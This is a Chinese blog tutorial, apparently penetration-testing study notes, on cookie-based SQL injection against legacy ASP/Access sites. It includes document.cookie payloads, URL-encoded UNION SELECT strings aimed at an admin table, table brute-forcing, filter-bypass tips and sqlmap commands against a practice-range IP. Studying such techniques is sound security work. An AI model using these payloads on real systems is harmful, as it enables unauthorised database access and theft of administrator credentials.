Access-Cookie注入

最新推荐文章于 2022-10-20 21:06:09 发布
最新推荐文章于 2022-10-20 21:06:09 发布
阅读量215 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45634365/article/details/114264607
版权

一、Cookie注入简介

Cookie是代表身份的一串字符,网站根据Cookie来识别身份,如果获取了管理员的Cookie,就可以无需密码直接登陆管理员账号。

Cookie注入原理:
在动态脚本语言中存在超全局变量可以获取多种传参方式(大多数),开发者考虑到多种接受参数,在解释参数的时候也是用多种解释传参的方法。

例如,PHP中的$_REQUEST变量可以获取POST、GET、COOKIE传参

常见的数据库有Access、Mysql、mssql(SqlServer)、Oracle

Cookie注入在老一点的ASP网站常见,PHP看版本,因为在高于5.2以上的PHP版本中,$_REQUEST变量将不再接受cookie传参

早期网站防护只检测GET和POST传参,没有检测COOKIE,所以可以绕过验证

Cookie注入是依靠特殊的传参方式产生的注入

二、设置Cookie

1、在浏览器中设置
谷歌浏览器:F5:Application:Cookie

浏览器设置可能会遇到问题
在这里插入图片描述

2、抓包直接修改

有一点需要注意的是,本地IP127.0.0.1无法被Burp抓包,必须使用分配的IP

在这里插入图片描述

3、使用浏览器插件修改

谷歌浏览器有修改Cookie的插件EditThisCookie,有可能被拦截

在这里插入图片描述

4、浏览器自带Javascript进行设置

谷歌浏览器:F12:Console

Cookie注入最好进行一次编码,与版本有关系

在线URL编码解码

document.cookie #查看当前Cookie

#Cookie名字为 id 
#escape是一个编码函数,会进行一次URL编码
document.cookie="id="+escape("171")

document.cookie="id=169"

在这里插入图片描述

#“+”号是拼接符
#escape是一个编码函数,会进行一次URL编码
#双引号代表字符串内容
document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

三、Cookie注入

一般而言,有两种绕过拦截的方法:
(1)走不被检测的入口
(2)规避规则

先使用插件添加一个新的Cookie
在这里插入图片描述
如果Cookie传参可以影响到页面,意味着存在Cookie传参,并且可以拼接进数据库

在线URL编码解码

Burp中也有URL编码模块Decoder
在这里插入图片描述
COOKIE注入时要删除URL内的id传参,URL里的id传参进去会有一个输出,cookie里也传参了一个id数值,他会优先接受GET的传参,具体看语言,PHP会优先接受Cookie传参.

#Cooike注入,需要URL编码

#注入语句
171 order by 10
#URL编码后,填入Cookie值
171+order+by+10

#检测输出点
#Access是一种较为老旧地数据库,没有库名,只有表和字段
#select 1,2,3是mysql特有的查询语句
#大部分数据库需要正常查询,即select XX from 表名
#猜测表名为admin
#admin表中常有id、username字段
171 union select 1,2,3,4,5,6,7,8,9,10 from admin
#网页编码后
171+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin
#使用Burp编码后,本质是相同的
%31%37%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%20%66%72%6f%6d%20%61%64%6d%69%6e

Access数据库,没有系统自带表,而且Access数据库只有一个数据库,不用纠结库名,只能通过爆破获取表名和字段名

在盛行Access数据库的年代,账号密码一般都在admin表的username和password字段中

#爆破表名
#exists()函数是检查子查询能否查询到数据,如果能会就返回True
#即如果页面正常,就是存在该表
#字段名可以通过偏移注入获取
and exists(select * from 表名) 

#在sqlmap中会有常见的表名
#常见的表名:admin、news、job、work、admin_user、user 
#sqlmap\sqlmap-master\data\txt\common-tables.txt
#sqlmap跑表名有时候也是强行爆破

判断网页的数据库(可能):
ASP:Access(接近淘汰)
PHP:Mysql、Oracle、Mssql
ASPX:mssql
JSP:Oracle、Mysql

#是mysql特有的注释
mssql有特有的系统自带库名
oracle有特定的语法

有的站点会伪装后缀,使得他人不能够判断数据库,可以抓包看一下,即查看返回包(Repeater模块)的X-Powered-By标识,当然,有的网站也会处理返回包
在这里插入图片描述

sqlmap跑Cookie注入:

python sqlmap.py -r 1.txt

在这里插入图片描述

python sqlmap.py -u "http://59.6.20.9:8004/shownews.asp" --cookie "id=171" --level 2

sqlmap能跑出来的标识:
在这里插入图片描述
可能存在Cookie注入的网站:
(1)ASP的站点存在可能性极高
(2)PHP版本低于5.3的站点存在可能性极高

当然,Cookie注入并不是优先手段,SQL注入是存在尝试顺序的:
(1)显错注入
(2)报错注入
(3)布尔盲注
(4)时间盲注
(5)宽字节注入
(6)Cookie注入

设置Cookie能够影响到页面的数据,不代表存在SQL注入

弈-剑
关注
专栏目录
Access数据库——Cookie注入
weixin_41487522的博客
04-27 396
Access数据库——Cookie注入 Cookie注入简介 什么是Cookie? Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。无论何时用户链接到服务器,Web 站点都可以访问 Cookie 信息。说白了Cookie就是代表你身份的字符串,网站根据Cook...
Access-偏移注入
weixin_45634365的博客
03-02 317
在SQL注入的时候会遇到一些无法查询列名的问题,例如系统自带数据库的权限不够而无法访问系统自带库,例如Access根本没有系统自带库,需要强行猜解表名 在猜到表名无法猜到字段名的情况下,可以使用偏移注入来查询表里面的数据 像sqlmap之类的工具实际上是爆破字段的名字,但是如果字段名比较奇怪,sqlmap就无能为力了 偏移注入终比较常用的方法是移位溢注 移位溢注 #假设admin表里面有id、username、password三个字段 #admin.*代表了admin表里所有的字段 select * fro
Access——Cookie注入
qq_45300786的博客
07-18 547
这里我们使用cookie来传参的,注意php5.4以上的版本就不会接受cookie传参了 下面我们就在本地服务器来试一试 先写一个php传参文件 然后进行传参,可发现,传参成功。 那么接下来我们就来使用cookie传参 ...
Access注入Cookie注入
Mr.Huang_的博客
09-02 187
一、Cookie注入简介 二、怎么修改Cookie 我们知道了Cookie注入的原理~那么下一步我们该学习的就是如何修改网站原有的Cookie 我们可以使用很多方法设置Cookie 这2点同时满足才可以执行!!!!!!!!!!! 1、只有旧的失效了(比如删了?id=170,也就是删了get传参),才会接受新的传参方式(比如这里的get传参失效,现在新的cookie传参才会生效) 2、如果由一种传参换成新的一种传参,第一次一定要在URL栏刷新,才会接受新的传参,否则还是接受原来的传参,第一次之后随便在那刷新
Accesscookie手工注入
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 289
cookie注入的原理其实并不复杂。学过ASP语言的应该都知道,在ASP中 例如: id=request.querystring(ID); id=request.form(ID); 在正常情况下程序员应该按以上规范进行代码的编写,但是部分程序员,为了方便却将代码写成了如下格式: id=request(ID); 虽然此时也加了防注入程序。但是,防注入程序并不支持基于cookie提交的数据。...
sqlmap----Cookie注入实战
小明师傅博客
06-06 538
这里我们用封神台的靶场演示 一个典型的cookie注入 测试时被waf,限制了 上sqlmap sqlmap.py -u "xxxxxxxx/shownews.asp" --cookie "?id=170" --leve2 --table 这里不知道为什么leve 5 不行,不过2是专门给cookie注入用的,还有这里为什么不爆库呢,因为这里是asp+access数据库,查询不了,所以直接查2表 拿到密码,找后台,登陆 ...
cookie注入详解(access)
最新发布
weixin_45698828的博客
10-20 1408
SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。
Access注入Cookie注入+偏移注入
m0_55854679的博客
02-13 1533
文章目录cookie注入什么是cookie什么是cookie注入设置cookie cookie注入 什么是cookie Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。 什么是cookie注入 在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上) 很多开发的时候为了考虑到多种接受参数,在接受参数的时候都是用多种解释传参的方法 例如:php中的$_REQUEST[] 可以获取POST|GET|COOKIE
渗透测试基础-Access数据库之cookie注入
weixin_45488495的博客
04-11 427
渗透测试基础-Access数据库之Cookie注入Access数据库Cookie注入Access数据库-Cookie注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! Access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。它发布
五、数据库注入——(1)access注入——Cookie注入
weixin_45540609的博客
04-19 377
一、Cookie 一种代表身份的字符串,网站根据Cookie来识别你是谁 在动态脚本语言中存在超全局变量可以考虑多种传参方式,很多时候开发的时候为了考虑到多种接收参数,在接收参数的时候用的多种解释传参的方式,如php的$_REQUEST[]可以获取POST|GET|COOKIE值,但php5.4以上版本不会接收Cookie传参了。 如果post和get被waf拦截,也许waf没有对cookie拦截,就可以进行cookie传参,绕过监测机制。 1、设置cookie: 1、依靠浏览器开发者..
access学习_Access注入Cookie注入(学习笔记)
weixin_39742727的博客
11-21 157
理论Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪.Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同Cookie注入典型步骤1.寻找形如“.asp?id=xx”类的带参数的URL。2.去掉“id=xx”查看页面显示是否正常...
Access--cookie注入学习篇
weixin_46865273的博客
04-24 278
1、什么是cookiecookie就是代表你身份的一串字符串,网页根据cookie来识别你是谁,如果你获得了管理员的cookie,你可以无需密码直接登录管理员账号。 2、cookie注入原理: 在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上) 很多时候开发在开发的时候为了考虑到多种接受参数,在接受参数的时候都是用多种解释传参的方法 例如: php中的$_REQUEST[] 可以获取POST|GET|COOKIE传参 注:php 5.4以上版本就不会接受Cookie传参了。 如
Access-Cookie注入和偏移注入
qq_68233961的博客
07-31 534
Access-Cookie注入和偏移注入
mysql+access数据库手工注入
SoulCat
09-17 1067
mysql+access数据库手工注入 所有的玩笑里都藏着认真. 注入可以分很多种 根据数据类型 1,整形注入 2,字符型注入 3,搜素型注入 根据注入语法 1,可联合查询注入 2,可多语句查询注入 3,报错型注入 4,布尔型注入 5,基于时间延迟注入 6,宽字节注入 (前提字符型注入 ,gbk %df(查gbk表)和%27单引号 生成汉字) mysql注入: 常用函数: system_...
Access数据库注入cookie注入
seek_2022的博客
05-02 1834
文章目录一、cookie注入简介(一)什么是cookie(二)为什么会存在cookie注入?二、如何修改cookie(一)通过Javascript来设置Cookie(二)通过浏览器的Application来修改(三)通过burp抓包去修改cookie(四)通过浏览器插件进行修改三、cookie注入靶场思路(一)靶场需要注意的地方(二)如何删除GET传参(三)access数据库注入的特点四、靶场实战(一)测试cookie传参(二)测试cookie注入(三)爆破表名(四)判断字段数(五)判断显错位(六)查询ad
Access注入cookie注入(含靶场练习)
weixin_60777183的博客
08-31 659
一.cookie注入简介 Access → 数据库的一种。除了Access,还有mysql,mssql(sql server),Oracle等 cookie注入→特殊的传参方式产生的注入。所以cookie注入只跟传参方式有关,跟别的一概没有关系。 什么是CookieCookie是代表身份信息的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,可以无需密码直接登录管理员的账号。类似门禁卡、身份证。 二.怎么修改cookie 1.方法一:浏览器修改(不推荐) 浏..
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1258
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
SQL注入工具sqlmap新版本发布 - 安全测试更进一步
该工具支持多种数据库管理系统,如MySQL, PostgreSQL, Oracle, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB,并且提供了一系列高级功能,可以自动检测SQL注入漏洞,获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

弈-剑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值